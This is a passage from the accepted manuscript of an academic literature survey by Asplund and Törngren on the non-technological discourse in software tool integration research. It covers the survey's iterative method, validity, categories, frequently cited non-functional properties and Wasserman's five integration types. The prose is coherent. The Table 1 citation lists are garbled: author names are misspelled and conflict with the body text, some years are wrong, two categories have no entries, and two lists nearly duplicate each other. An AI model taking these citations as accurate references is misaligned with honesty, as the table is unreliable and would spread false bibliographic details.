This is the accepted version of a paper published in *Journal of Systems and Software*. This paper has been peer-reviewed but does not include the final publisher proof-corrections or journal pagination. Citation for the original published paper (version of record): The Discourse on Tool Integration Beyond Technology, A Literature Survey. *Journal of Systems and Software*, 106: 117-131 Access to the published version may require subscription. N.B. When citing this work, cite the original published paper. Permanent link to this version: http://urn.kb.se/resolve?urn=urn:nbn:se:kth:diva-169635 The Discourse on Tool Integration Beyond Technology, A Literature Survey Fredrik Asplund\textsuperscript{a,1,∗}, Martin Törngren\textsuperscript{a} \textsuperscript{a}KTH Royal Institute of Technology, Department of Machine Design, Division of Mechatronics, Brinellvägen 83, 10044 Stockholm, Sweden Abstract The tool integration research area emerged in the 1980s. This survey focuses on those strands of tool integration research that discuss issues beyond technology. We reveal a discourse centered around six frequently mentioned non-functional properties. These properties have been discussed in relation to technology and high level issues. However, while technical details have been covered, high level issues and, by extension, the contexts in which tool integration can be found, are treated indifferently. We conclude that this indifference needs to be challenged, and research on a larger set of stakeholders and contexts initiated. An inventory of the use of classification schemes underlines the difficulty of evolving the classical classification scheme published by Wasserman. Two frequently mentioned redefinitions are highlighted to facilitate their wider use. A closer look at the limited number of research methods and the poor attention to research design indicates a need for a changed set of research methods. We propose more critical case studies and method diversification through theory triangulation. Additionally, among disparate discourses we highlight several focusing on standardization which are likely to contain relevant findings. This suggests that open communities employed in the context of (pre-)standardization could be especially important in furthering the targeted discourse. Keywords: Tool Integration, Support Environments 1. Introduction Tool integration is a cross-disciplinary research area incorporating influences from many fields, such as Software Engineering, Systems Engineering, Human-Machine Interaction and Economics. Buxton’s STONEMAN report is often \textsuperscript{∗}Corresponding author Email addresses: fasplund@kth.se (Fredrik Asplund), martint@kth.se (Martin Törngren) \textsuperscript{1}Phone: +46 8 790 7405, Fax: +46 8 20 22 87 mentioned as a starting point for the discussion on tool integration (Buxton, 1980). Buxton (1980) specified the requirements for a support environment for programming Ada by defining the appropriate tools, tool integration mechanisms and interfaces, but also introduced the notion of integrating tools throughout a software project life-cycle. During the 1980s a plethora of initiatives to specify support environments followed, the most well-known being the European Portable Common Tool Environment (PCTE) initiative. In the late 1980s and early 1990s, this carried over into an intense academic discussion regarding many different types of support environments. It was already clear at this point that the research on tool integration consisted of several different strands of research (Brown, 1993a). The identified strands currently include the (overlapping) categories of tool integration versus mechanisms, technology, frameworks, semantics, modelling, process, dimensions, types, standards and industrial experience (Brown, 1993a; Wicks, 2004; Maalej, 2009). Throughout the last two decades, the strand that has seen the majority of the activity is the one that focuses on the technology, i.e. the separate mechanisms for achieving tool integration (Wicks and Dewar, 2007). Many valuable findings and insightful discussions are found in this particular strand of research, for instance those related to technological innovations such as Eclipse and Open Services for Lifecycle Collaboration (OSLC). The former is an innovative plug-in framework technology that once turned the entire tool integration market upside down, while the latter is a web API technology that currently shows promise of a large impact. However, the other strands of work are also important, although their influence is currently much more difficult to appraise. This paper focuses on those strands of tool integration research that have implications beyond a specific technology. It contributes to the body of knowledge in tool integration by providing an exploratory literature survey focused on the issues with (and discussion of) tool integration that go beyond solving technological challenges. Our hope is that this will support disruptive change. Incremental changes to technology are valuable, but progress in the tool integration field has been painstakingly slow. If the solutions provided by academia cannot gain traction and impact within industry, then our understanding of industry must be flawed. Identifying missing knowledge might eventually facilitate more relevant technological choices. It could also lead to the removal of unknown, non-technological obstacles hindering the successful deployment of tool integration. Furthermore, it should point to changes to current research approaches to allow for more efficient, conclusive research into the field. The background is our part in the iFEST project (iFEST Consortium, 2013), an EU research project focusing on the specification and implementation of an integration framework for establishing and maintaining tool chains to engineer complex industrial embedded systems. While building support environments is a challenging task due to the sheer complexity of today’s technology, many of the difficulties encountered during iFEST were not linked to technology per se. The choice of a particular approach or technology could make perfect sense to one stakeholder, while another discounted it outright. The ensuing discussions pointed at a lack of adequate research into more high level questions, such as how to prioritize between business models, stakeholders or even different academic discourses. To avoid a situation in which discussions would have degenerated into a mere battle of wills, and to enable an unbiased approach to tool integration, we chose early on to focus on the strands of research that try to reach an overall understanding of what tool integration is. Thus, by identifying the essential core of the cross-disciplinary discourse related to tool integration, we aimed to facilitate future decisions on tradeoffs and identify any weaknesses in the discourse that may make such decisions difficult. To achieve this, we designed a literature survey that focused on what we called the *essence of tool integration* - how it is discussed, the context of this discussion and what the implications are. In other words, the survey focused on the non-technical aspects of the tool integration literature, such as how tool integration is defined, if the concept can be further divided into separate parts, what its purpose is and what is required to achieve it. In addition, the survey considered when these types of questions tended to arise and to what purpose. This also means that we have tried to go beyond discussing such things as individual meta-models, reference models and patterns, at least beyond what is motivated by our approach. While these capture important aspects of tool integration at an abstract level, they focus on functionality and usually do not cover the even higher levels of abstraction targeted by this study. The basis for the paper is, as will be explained in the subsequent sections, a paper by Wasserman (1990). This paper is a widely recognized seminal paper in the strands of research focusing on issues of tool integration beyond technology. The status of this paper stems from its definition of what later became a much used classification scheme based on different “dimensions” of tool integration, namely *Control, Data, Platform, Presentation* and *Process Integration*. It has been popular to use these dimensions as support when reasoning about tool integration. This scheme is further described in Section 5. The paper is divided into five distinct parts due to the exploratory nature of the study. The first part defines the questions that guided our exploratory investigation (Section 1) and motivates the approach towards answering these questions (Section 2). The second part discusses how these questions led to the allocation of the surveyed papers into initial categories based on common traits or unique contributions related to the initial questions (Section 3). In the third part these categories are used to elicit and analyse four ways in which the discussion of tool integration that go beyond solving technological challenges is either strong or weak (separate discussions in Sections 4 to 7). Which conclusions that are possible to draw based on these analyses is discussed in the fourth part of the paper (Sections 8). Finally, the core findings and conclusions are summarized in the last part (Section 9). 2. An Iterative Literature Survey This section starts with explaining the approach of this literature survey. A case is then made for the validity of the research findings based on the approach and extra precautions taken. 2.1. The Approach The findings presented in this paper come from an iterative literature survey, which took place over a period of four years. The first iteration, in which the State of the Art of tool integration was studied, took place early 2010 during the start of the iFEST project. The 39 sources studied during this iteration consisted of most of the Association for Computing Machinery (ACM) Digital Library (Association for Computing Machinery, 2013) database citation list for Wasserman (1990). The second iteration took place between 2010 and 2012, at the same time as the main part of the iFEST project. Made up of a consortium of 21 partners, consisting of international companies and universities, much input was obtained on different approaches to tool integration. When compiling the most interesting work obtained in regard to the essence of tool integration, it became obvious that most of these sources were based on or oriented around Wasserman (1990). The third iteration took part from late 2012 to early 2013 and focused on the sources in the ACM Digital Library (Association for Computing Machinery, 2013) and the Google Scholar (Google, 2013) databases which cite Wasserman (1990). All highly cited sources from 1990 to early 2013 were included. Furthermore, all sources issued from 2007 to 2012 were included in the study regardless of how many times they had been cited. These criteria ensured that all relevant sources received from iFEST partners during the previous iteration were formally included. At this time a total of 75 relevant sources had been identified during the second and third iteration. Based on the discussion in these sources, a further 15 sources of interest were identified, bringing the total number surveyed during the second and third iteration up to 90. In practice this primarily involved using citations to backtrack to sources discussing classification schemes other than Wasserman’s. In the final iteration the whole set of sources were surveyed again to summarize and double-check the data presented in this paper. Out of 129 sources, 117 were eventually used as a basis for the survey. The 12 sources excluded were deemed not to contribute to the targeted discussion, i.e. the discussion of what we called the essence of tool integration. This decision was based on a careful reading of the complete sources after which we could not include them in any of the categories described in Section 3. This does not reflect on the quality of these sources or their usefulness in surveys with other focuses. --- 2One source was not possible to obtain. 3A high count was defined as 20 citations or more. 4In comparison with the first iteration, the citation lists contained 90 additional sources fitting the criteria at this time. However, 1 source did actually not refer to Wasserman (1990), 7 sources could not be used due to language difficulties and 7 sources proved to be inaccessible. Only 4 of the excluded sources were from the highly cited category. 2.2. The Validity of the Findings There is much advice to be found on how to conduct a literature survey, but time must be spent on research design to ensure the trustworthiness of the findings. The approach described in the previous subsection is primarily the result of considering the implications of the survey’s setup on validity. Experimental researchers commonly divide validity into internal and external validity, i.e. the degree to which a study can “measure what it aims to measure”, and the degree to which the research findings are generalizable to other “populations, settings, treatment variables and measurement variables” respectively (Kothari, 2004). This leads to a strong emphasis on validity, with literature studies often used as one way of proving the internal validity of an experimental study. Other researchers have challenged both these definitions of validity and the priority given to ensuring it, for example Glaser and Strauss in their discussion on the generation of theory through Grounded Theory (Glaser and Strauss, 1967). Nevertheless, validity remains an important issue to consider in any given research design. Given the aim of this literature survey (to understand how the essence of tool integration is discussed, the context of this discussion and what the implications are) the issue of external validity has been treated as a coverage problem. Instead of claiming the possibility to generalize to other sources and focusing on sampling, the scope of the literature survey was set early on to all sources that cited Wasserman (1990). Two consequences of this approach ensured a high coverage of sources related to the discourse on the essence of tool integration: Firstly, most papers discussing the essence of tool integration somehow orient themselves in regard to the most seminal papers in the field, of which Wasserman (1990) is one; and secondly, any high quality source that does not cite Wasserman (1990) is likely to be cited by at least some of the subsequently published sources on the essence of tool integration. The latter means that high quality sources missed by the early iterations could be identified by backtracking from sources in later iterations. Two additional choices were also made to eliminate potential sources of selection bias: the choice of databases included both a traditional research database (Association for Computing Machinery, 2013) and a Big Data research database (Google, 2013); and, even though high citation rankings were used to identify relevant historical sources, the sources from 2007 to 2012 were included regardless of their citation rank. This ensured that sources that have not been around for long enough to be widely recognized were included anyway. We can thus be reasonably confident that we have captured the relevant parts of the targeted discourse (particular strands of research in the tool integration literature). However, discourses are dynamic things, which require a sharing of authors, concepts and terminology to connect. There may well be separate discourses that contain relevant findings, but which researchers active in the discourse on tool integration either never encounter or immediately dismiss because the relevance is not obvious. When researchers are able to establish an unexpected connection between two discourses previously thought of as disparate, the results may however be far-reaching. Consider for instance when Reynolds (1987) introduced a computer model mimicking animal aggregation. This work, based on input from biology, has eventually inspired research in such distant fields as networked control and robot navigation. Unfortunately it is not trivial to establish connections between disparate, but principally related, discourses. Therefore, we choose to sample our sources from the literature related to tool integration and those discourses already connected to it, but will return to this discussion at the end of Section 8. Our approach unfortunately makes the issue of internal validity more complex, since it then amounts to proving that the literature survey method is in itself a reasonable means of answering the research questions. In other words, even if all relevant literature is consulted, what if it does not reflect the actual discourse on the essence of tool integration? Therefore, to ensure the validity of the survey, a data triangulation (Denzin, 2006) was performed. The categories that had been identified through the survey were used to quantify the answers and questions in a questionnaire issued by the iFEST project in 2010. The focus of the questionnaire was Best Practices in embedded system development with regard to tool integration. It was compiled by leading experts in different aspects of tool integration, more precisely researchers and practitioners from the iFEST partners. Most of these researchers and practitioners each have more than 10 years’ experience of working with tools in their field. Tool integration was thus considered from in-depth experiences on this subject with regard to requirements engineering, project management, verification and validation techniques, large IT systems, embedded technology, mechatronics, hardware and software co-design, software architectures, formal verification, etc. The design of the questionnaire included both open and closed questions. The questionnaire was sent out to and answered by 23 respondents at 14 European industrial companies. This ensured that answers were provided by (project and product) managers, engineers from different domains, researchers and software architects. The questionnaire is itself therefore an example of a summary of the most important parts of the current industrial discourse. The questionnaire was ensured to be unbiased and cover tool integration relevant to all parts of a product’s life-cycle through discussions among the experts aimed at identifying a wide set of activities and stakeholders. Furthermore, the results of the questionnaire were later validated through discussions with other research projects in which the iFEST partners were present. The results from this comparison are presented at the end of Sections 4, 5, 6 and 7 to support the claim that method bias has not significantly decreased the internal validity. --- 5 The observant reader may object to this triangulation on the grounds that iFEST targeted the embedded systems community. The results of the questionnaire may therefore be biased towards that domain, while the intent of this survey is to consider the whole tool integration field. It is then important to remember that the targeted bias is not selection bias but method bias - the requirement on the triangulation is therefore to unearth problems with validity related to across-the-board differences in industrial practice and not necessarily to profile the academic discussion against each and every industrial domain. 3. An Initial Categorization Brown (1993a), Wicks (2004) and Maalej (2009) have provided valuable categorisations of different strands of tool integration research. However, although they were used as a starting point for this literature survey, ultimately they were too broad for our purpose. More refined (possibly overlapping) sub-categories were instead sought. In addition, seminal papers clearly belonging to a particular strand of research were not necessarily the best for capturing all of these cross-disciplinary strands. A more useful approach was to also survey papers with a focus on technology but partially discussing other strands of research. In short, more “finely grained” categories were required than those provided by Brown (1993a), Wicks (2004) and Maalej (2009). The sources therefore had to be continuously categorized during the reading (and re-reading) to establish a suitable classification scheme. This was done iteratively through discussions among the authors based on excerpts from the sources, with external feedback as noted in the Acknowledgments section. The sources were thus allocated to categories in the process of discovering topics and relationships that were related to the previously mentioned questions linked to the essence of tool integration. The result is a new categorisation scheme that is more fine-grained than already existing ones. The final allocation of sources is presented in Table 1 together with, for convenience, the percentage of sources allocated to each category. The way the topics were handled and the relationships between the categories led to further analysis in four main directions. The reasoning behind this is described below and summarized in Table 2. **Category 1** includes sources that add to the discussion of non-functional properties related to tool integration. The typical source touches upon this category by referring to different non-functional properties that are either problematic to or addressed by the discussion in the source. However, usually no in-depth motivation is given for how the non-functional properties were chosen or how they relate to each other. The category is detailed further in Section 4. **Category 2** includes sources that use one or more classification schemes to structure (part of) their discussion. Two other categories merit mentioning together with category 2. The first is **category 3**, which includes sources that elaborate on Wasserman’s types of tool integration. The second is **category 6**, which includes those sources that reference a classification scheme other than that of Wasserman (1990). Together these three categories point to the importance given to classification schemes when discussing tool integration, but also to the deep disagreement on exactly what makes a scheme complete. Further research in the direction of these categories is discussed in Section 5. **Category 4** includes sources that present or suggest the implementation of a framework, i.e. a realization in software to support tool integration. This is related to two other categories. The first is **category 5**, which includes sources that present some kind of reference model related to the design for or evaluation of tool integration. Here the term reference model is used to indicate a more abstract definition, which does not have to be immediately realizable. The second is **category 7**, which includes sources that present some kind of product related to tool integration (data integration tools, languages for generating tool integration software, etc.). To some extent these categories “blur” into each other, with the allocation to a specific category depending on the emphasis used by the individual authors. With such a high focus on implementation and providing reference models, one would expect the context of tool integration to have been discussed in-depth. Further research in the direction of these categories is discussed in Section 6. Category 8 and category 9 are straightforward. The former includes sources that evaluate standards, reference models or specifications related to tool integration. The latter includes sources that provide an in-depth reporting on empirical data related to tool integration. Both of these categories are rather small, which raised concerns regarding the theoretical underpinning of the targeted discourse. This merits a closer look at which research methods are used in these sources, detailed further in Section 7. Table 1: Categories | Category 1. Discusses non-functional properties in relation to tool integration (53%) | |-----------------|-----------------|-----------------|-----------------|-----------------|-----------------|-----------------|-----------------|-----------------|-----------------|-----------------|-----------------|-----------------|-----------------|-----------------|-----------------|-----------------|-----------------|-----------------|-----------------|-----------------| | (Osterweil, 1988), (Clément, 1989), (Burl, 1986), (Brown et al., 1992), (Harriison et al., 1992), (Brown, 1988a), (Long and Morris, 1993), (Belkhatir et al., 1989), (Brown and Penrose, 1989), (Finkelstein et al., 1989), (Sum and Kodf, 1984), (Welsh and Wong, 1984), (Gautier et al., 1992a), (Tilley, 1992b), (Tilley and Smith, 1993), (Wasserman, 1994a), (Zeidman, 1994), (Belkhatir, 1993b), (Stavridou, 1993), (Westfechtel, 1993), (Wong, 1993a), (Arndt, 2001), (Engsig and Jesko, 2001), (Biel et al., 2002), (Meier et al., 2002), (Lounis et al., 2002), (Schneider and Marquardt, 2002), (Bartelhues, 2003), (Michaud, 2003), (Marquardt and Nagl, 2004), (Tilley et al., 2004), (Dewar, 2005), (Biel et al., 2006), (Kuppermann et al., 2006b), (Kraemer et al., 2006), (Margolese, 2006), (Shi, 2007), (Wick and Dewar, 2007), (Kornwasser and Abramson, 2008), (Hein et al., 2009), (Maekel, 2009), (Biel et al., 2010b), (Bartelhues, 2011a), (Leuthäuser and Neiterov, 2010), (Biel et al., 2010a), (Armengaud et al., 2011), (Biel et al., 2011), (Cecchelli et al., 2011), (Craiger et al., 2011), (Koozmen, 2011), (Kornwasser and Abramson, 2011), (Peschel et al., 2011), (Wende et al., 2011), (Armengaud et al., 2012), (Biel et al., 2012a), (Biel et al., 2012b), (Jarcovici, 2012), (Shenghun, 2012), (Biel, 2012) | | Category 2. Uses a classification scheme to structure the discussion (44%) | |-----------------|-----------------|-----------------|-----------------|-----------------|-----------------|-----------------|-----------------|-----------------|-----------------|-----------------|-----------------|-----------------|-----------------|-----------------|-----------------|-----------------|-----------------|-----------------|-----------------|-----------------| | (Clément, 1989), (Brown and McDermid, 1984), (Brown et al., 1982), (Cheon and Nam, 1993), (Harriison et al., 1982), (Arnold and Nejahi, 1992), (Bartelhues and Marquardt, 2002), (Biel et al., 1992a), (Brown, 1992b), (Long and Morris, 1993), (Arnold, 1994), (Brown et al., 1994), (Cathale, 1995), (Bouan and Brinkkemper, 1995), (Gautier et al., 1995a), (Gautier et al., 1995b), (Wasserman, 1995), (Baco and Hornowitz, 1996), (Belkhatir, 1997), (Kordon and Moumi, 1997), (Hein, 1998), (Stavridou, 1998), (Westfechtel, 1998), (Wong, 1998), (Grundy et al., 1999), (Arndt, 2001), (Engsig and Jesko, 2001), (Michaud et al., 2001), (Krause et al., 2001), (Lezvak et al., 2002), (Schneider and Marquardt, 2002), (Bartelhues, 2003), (Stroede et al., 2003), (Koeven and Müller, 2007), (Margolese, 2007), (Biel, 2008), (Biel et al., 2009), (Biel et al., 2010a), (Biel et al., 2014b), (Bartelhues, 2010), (Leuthäuser and Neiterov, 2010), (Aspaudi et al., 2011), (Biel, 2011), (Biel et al., 2012), (Craiger et al., 2011), (Kornwasser et al., 2011), (Armengaud et al., 2012), (Biel et al., 2012a), (Jarcovici, 2012), (Biel, 2012) | | Category 3. Elaborates on Wasserman’s types of tool integration (41%) | |-----------------|-----------------|-----------------|-----------------|-----------------|-----------------|-----------------|-----------------|-----------------|-----------------|-----------------|-----------------|-----------------|-----------------|-----------------|-----------------|-----------------|-----------------|-----------------|-----------------|-----------------| 8 Category 4. Presents or suggests a framework implementation (38%) (Osterweil, 1988), (Beer, 1989), (Chen and Norman, 1992), (Breitmann et al., 1992), (Belkhatir et al., 1994), (Nuseibeh et al., 1994), (Nuseibeh, 1994), (Sum and Bold, 1994), (Belkhatir and Almeida-Naser, 1995), (Gautier et al., 1995a), (Gautier et al., 1995b), (Tilley, 1995), (Emmerich, 1996), (Valetto and Kaiser, 1996), (Belkhatir, 1997), (Korden and Moonier, 1997), (Pohl and Weidenhaupt, 1997), (Pohl et al., 1999), (Heise, 1999), (Westfehlt, 1999), (Grundy et al., 2001), (Arzadi and Jasek, 2001), (Bandy et al., 2002), (Margardt and Nagl, 2004), (Mampilly et al., 2005), (Kouamou et al., 2005), (Barzou et al., 2006), (Mandala, 2007), (Heis et al., 2008), (Wende et al., 2010), (Arzadi and Jasek, 2011), (Biel et al., 2011), (Biel et al., 2011), (Ceccarelli et al., 2011), (Nakagawa et al., 2011), (Wende et al., 2011), (Biel et al., 2012), (Jaouadi and Al-Sudairi, 2012), (Biel et al., 2013), (Nakagawa and Al-Sudairi, 2013) Category 5. Presents a reference model (34%) (Clement, 1990), (Kael, 1990), (Brown and Seiler, 1992), (Brown et al., 1992), (Harrison et al., 1992), (Arnold, 1994), (Brown et al., 1994), (Nuseibeh, 1994), (Weich and Yang, 1994), (Tilley, 1995), (Barrett et al., 1996), (Chittister and Haimes, 1996), (Tilley et al., 1996), (Kendon and Moonier, 1997), (Kendon, 1998), (Deier and Durante, 1998), (Deier and Jasek, 2001), (Kendon and Moonier, 2001), (Deier and Jasek, 2001), (Kendon and Moonier, 2001), (Kouamou et al., 2005), (Kouamou et al., 2005), (Barzou et al., 2006), (Mandala, 2007), (Heis et al., 2008), (Wende et al., 2010), (Arzadi and Jasek, 2011), (Biel et al., 2011), (Biel et al., 2011), (Ceccarelli et al., 2011), (Nakagawa et al., 2011), (Wende et al., 2011), (Biel et al., 2012), (Jaouadi and Al-Sudairi, 2012), (Biel et al., 2013), (Nakagawa and Al-Sudairi, 2013) Category 6. Uses a classification scheme other than Wasserman’s (28%) (Clement, 1990), (Kael, 1990), (Brown and Seiler, 1992), (Brown et al., 1992), (Harrison et al., 1992), (Arnold, 1994), (Brown et al., 1994), (Nuseibeh, 1994), (Weich and Yang, 1994), (Tilley, 1995), (Barrett et al., 1996), (Chittister and Haimes, 1996), (Tilley et al., 1996), (Kendon and Moonier, 1997), (Kendon, 1998), (Deier and Durante, 1998), (Deier and Jasek, 2001), (Kendon and Moonier, 2001), (Kouamou et al., 2005), (Kouamou et al., 2005), (Barzou et al., 2006), (Mandala, 2007), (Heis et al., 2008), (Wende et al., 2010), (Arzadi and Jasek, 2011), (Arzadi and Jasek, 2011), (Kouamou et al., 2005), (Kouamou et al., 2005), (Nakagawa et al., 2011), (Wende et al., 2011), (Biel et al., 2012), (Jaouadi and Al-Sudairi, 2012), (Biel et al., 2013), (Nakagawa and Al-Sudairi, 2013) Category 7. Presents a product related to tool integration (14%) Table 2: Further Analysis based on Topics and Relationships <table> <thead> <tr> <th>Category</th> <th>Motivation</th> <th>Discussed Further in Section</th> </tr> </thead> <tbody> <tr> <td>1</td> <td>Non-functional properties often referred to, but in vague terms.</td> <td>4</td> </tr> <tr> <td>2, 3 and 6</td> <td>Large and varied amount of classification schemes.</td> <td>5</td> </tr> <tr> <td>4, 5 and 7</td> <td>High focus on frameworks, reference models and associated products (concepts that to some extent “blur”), implying a well known system context.</td> <td>6</td> </tr> <tr> <td>8 and 9</td> <td>Small effort on evaluation and empirical data, raising concerns with regard to the theory underlying the discussion.</td> <td>7</td> </tr> </tbody> </table> 4. Tool Integration and Non-functional Properties The type of non-functional properties and the way in which they have been discussed is detailed further in this section. To support the internal validity of these findings, the most frequently mentioned non-functional properties are then compared to those frequently occurring in the iFEST questionnaire. 4.1. Findings As seen in Table 1, a majority of the sources touch upon the non-functional properties of tool integration. These properties are by nature not easily defined, with most sources not offering any clear definitions, priority order or discussion of how these properties relate. An examination of the definitions of the properties given by the sources also shows that different names are often used to refer to the same property, and vice versa - that the same name can actually refer to different properties. Nevertheless, even after merging the cases when the sources simply seem to be using different terminologies, one is still left with an impressive 30 different non-functional properties. Of these properties the 10 most often mentioned make up 73% of the occurrences counted, with the top six properties on their own claiming similar shares out of 58% of the occurrences counted (see Figure 1). Furthermore, when the top six properties are laid out in a graph showing their occurrences across the last two decades, each show an even distribution over time (see Figure 2). In other words, throughout the discourse a few non-functional properties have stood out as more important to discuss than others. The top six of these non-functional properties are discussed in more detail below. - **Flexibility** is the ease of which a support environment can be adapted. A requirement for flexibility can stem from the need to handle early mis- understandings of the requirements on a support environment (Osterweil, 1988), seamlessly introduce novel features (Tilley and Smith, 1996) and support cost savings (Welsh and Yang, 1994). Flexibility is therefore dis- cussed both in regard to the parts that make up a support environment and a support environment seen as a whole. The former discussion has for instance touched upon the interchangeability of tools (Jucovschi, 2012), while the latter has dealt with how to adapt to the specific conditions of different companies (Endig and Jesko, 2001) or even different application domains (Becker et al., 2002). - **Scalability** is the degree to which a support environment can be treated, and be expected to behave, similarly, regardless of changes to the number of parts that it consists of. Lack of scalability support can show itself through inconsistencies (Finkelstein et al., 1994) or by end users being overwhelmed by too much information (Tilley, 1995). Scalability can be discussed in relation to parts of support environments, such as standard exchange formats (Holt et al., 2006). However, some regard this property as primarily related to the whole (Miadidis, 2007). Solutions for achieving scalability have been put forward in both of these discussions. Scalability has for instance been claimed to be a benefit of component-based archi- tectures (Michaud, 2003). However, no strong case has been made for a relationship between these solutions and certain high level issues linked to scalability, such as the flaws in cognitive support and knowledge transfer mentioned by Brown and Penedo (1994). - **Cost** is the impact that support environments have on financial matters. When discussed in a narrow sense, this relates to the direct costs of design- ing, constructing and deploying support environments (Brown, 1993b), but also how to measure their impact (Baik et al., 2002). When discussed in a broader sense, cost relates to the implications of the business context of related stakeholders. For instance, different business models of tool vendors have been discussed both as a limitation to which tools are integrated (Brown et al., 1992) and as a prerequisite for allowing any major benefits to be gained by deploying support environments (Tilley et al., 2004). In this discussion, the use of support environments has been mentioned as commonly based on business goals (Wicks and Dewar, 2007) or even as a critical part of achieving business success (Marquardt and Nagl, 2004). - **Evolvability** is the potential of a support environment to facilitate change over time. This is discussed from two perspectives. Firstly, in regard to changes inside the support environment itself. For instance, how the availability of evolvable support environments can be important in ensuring the success of new technology (Dewar, 2005) or how evolution needs to be possible to drive and direct (Osterweil, 1988). Secondly, in regard to how a support environment can be used to facilitate product evolution when used during development (Belkhatir et al., 1994; Belkhatir, 1997). Additionally, evolvability is also discussed in relation to whole support environments and the parts they are made up of: the former in regard to how economical and political influences can impact the possibility of support environments to evolve (Earl, 1990); and the latter in regard to which technology is best suited for facilitating change (Michaud, 2003). - **Efficiency** is discussed in conjunction with tool integration with regards to both the technological performance of support environments (Shi, 2007) and how organizations utilizing support environments can perform better (Armengaud et al., 2012). The latter, broader focus is naturally linked to the discussion on automation of tedious, repetitive tasks (Westfechtel, 1999). - The degree of standardization is the degree to which a support environment conforms to readily available specifications (even though the distribution of the specifications might be limited to, for instance, those that have paid a fee). The impact of standards may be on details and on broader concerns, since different standards target different levels of abstraction. The motivations given for an increased degree of standardization are therefore diverse, such as enabling adaption to different domains (Sum and Iholf, 1994), being a prerequisite to dealing with tool integration product lifecycle issues (Schneider and Marquardt, 2002), avoiding tool vendor lock-in (Ertürken, 2010), and so on. Even if the provided definitions help differ between the mentioned non-functional properties, it does not automatically mean that it is valuable to do so. In the case of support environments these non-functional properties can be too interconnected to allow for them to be studied in isolation. In Subsection 8.1 we provide a number of high level research questions connected to these non-functional properties for future research. An added benefit of pursuing several of these questions in parallel would the possibility to understand whether there are common obstacles, such as interconnectivity, to answering this type of questions. ### 4.2. Internal Validity of the Findings Of the non-functional properties mentioned in relation to tool integration in the iFEST questionnaire, the top 5 are the degree of standardization (31%), efficiency (22%), flexibility (12%), support for evolution (9%) and cost (8%). These are also the only ones with a considerable share of the total. Scalability is not mentioned at all. It is reasonable to assume that method bias has not lead to incomplete results, but that scalability is perhaps emphasized more in academic discourse than in industrial settings. ### 5. Integration Types Based on the importance given to classification schemes by the sources, this section starts by describing the way the sources have used and elaborated on Wasserman’s classification scheme (Wasserman, 1990), and then contrasts it with other approaches that describe tool integration at a high level of abstraction. To support the internal validity of these findings, the classification scheme introduced by Wasserman (1990) is also related to the iFEST questionnaire. 5.1. Findings Wasserman (1990) introduced 5 types of tool integration, namely Control, Data, Platform, Presentation and Process Integration. These are described as “dimensions”, i.e. separate, unconnected concerns. The separation between the types of tool integration rests on relating them to different kinds of supporting tools and mechanisms. These types of tool integration are by far the most popular idea brought forward by Wasserman (1990). While 44% actively use Wasserman’s types of tool integration to structure their discussion, a further 22% mention them. Out of the 28% that make use of other classification schemes, 40% do so in combination with Wasserman’s types of tool integration. However, a deeper investigation of the 66% that make use of Wasserman’s classification scheme, summarized in Figure 3, shows that the use is not coherent. Many of these sources elaborate on the meaning of the different types or choose freely which of them to take into account. In the five subsequent subsections we start by describing each of these types as they were presented by Wasserman (1990) and then go through how other sources have viewed them differently. Thereafter we discuss other approaches to defining types of tool integration and close by discussing the internal validity of the results. 5.2. Control Integration Wasserman (1990) described control integration as the ability of tools to notify each other of events and activate each other under program control. This definition prevails throughout the discourse, although a significant number of the surveyed sources try to add on different process aspects such as process management (Zelkowski, 1993), coordination and synchronization to enable cooperation (Nuseibeh, 1994) and the ability of tools to notify users (Biehl, 2011). Several sources also try to clarify control integration by tying its definition to tool functionality, for instance by referring to the use and provision of functionality (Thomas and Nejmeh, 1992), or the intent to combine functionality (Brown and Penedo, 1994). 5.3. Data Integration Wasserman (1990) described data integration as the ability of tools to share data with each other and manage the relationships among data objects produced by each other. This definition mostly prevails throughout the discourse. A few sources limit the definition, for instance by only referring to data sharing (Brown et al., 1994). Most sources try to clarify the definition through examples, e.g. data persistence (Stavridou, 1999), syntax (Biehl et al., 2010b), semantics (Schneider and Marquardt, 2002), consistency (Thomas and Nejmeh, 1992) and traceability (Koudri et al., 2011). 5.4. Platform Integration Wasserman (1990) described platform integration as the set of system services that provide network and operating systems transparency to tools and tool frameworks. This definition almost entirely prevails throughout the discourse, mostly in vague references to “common platforms”. The only elaboration makes the definition wider by including all common parts of an environment, rather than just services (Asplund et al., 2011). 5.5. Presentation Integration Wasserman (1990) described presentation integration as the set of services and guidelines that allow tools to achieve a common "look and feel" from the user’s perspective. This definition prevails throughout the discourse, but with several interesting points raised by those that do not adhere to it. Some sources add to the definition by including user interface sophistication (Brown et al., 1994; Stavridou, 1999) or interaction paradigms (Thomas and Nejmeh, 1992). Others entirely reject the view that the goal of presentation integration is always to produce a uniform user interface (Wong, 1999; Tilley, 2000; Asplund et al., 2011). These instead argue that the focus should be changed to the integration of the different users to the tools via their user interfaces. This means that a tool should be able to present different user interfaces to users with different professional roles, backgrounds, knowledge, purposes or visualization preferences. The goal of presentation integration would then be to facilitate the correct matching of user interfaces to the different users. The idea that presentation integration is by necessity a separate concern is even challenged by Stoeckle et al. (2005), since visualization notations may, through control or data integration, achieve the same result as a common “look and feel”. 5.6. Process Integration Wasserman (1990) described process integration as the integration of process management tools with other tools in the support environment. In a later paper Wasserman himself redefined this type of tool integration using the much wider “linkage between tool usage and the software development process” (Wasserman, 1996). In fact, many of the sources in the discourse have challenged Wasserman’s original definition. And in some cases, the later definition is used even though the sources refer to the original paper (Thomas and Nejmeh, 1992; Baruzzo and Comini, 2007). The most common way of defining process integration is to simply state that it concerns ensuring a proper match between processes and tool integration technology (Long and Morris, 1993). Other common definitions tie process integration to the definition and integration of process models (Nuseibeh, 1994), the awareness and enforcing of process constraints on tools based on user roles and process states (Kordon and Mounier, 1997), or both (Gautier et al., 1995a). Additionally, while the perspective of most sources is that processes should determine which tools are used and how they behave, a few sources acknowledge the fact that legacy tools and tool integration technology might enforce a particular structure on workflows (Marquardt and Nagl, 2004; Biehl et al., 2010a). 5.7. Other Approaches A classification scheme is a collection of conceptual categories that highlight important, distinct parts of a subject under discussion. As such it should be detailed enough to allow reasoning about (a part of) a subject, but also abstract enough not to unnecessarily confuse the discussion. Classification schemes are therefore closely related to reference models, the difference being that reference models even though they do not have to be immediately realizable should at least be detailed enough to allow independent work in relation to the subject (for instance on standards (Earl, 1990)). Not surprisingly one other approach to defining types of tool integration is therefore to link Wasserman’s types of tool integration to different parts of a reference model, for example as done by Brown et al. (1994) in relation to a reference model which divides support environments into three levels, namely the mechanism (how are the components in the support environment connected), service (what does the support environment provide) and process levels (which activities does the support environment support). Control, data, platform and presentation integration are allocated to the mechanism level, while process integration is allocated to the process level. The same source also raises 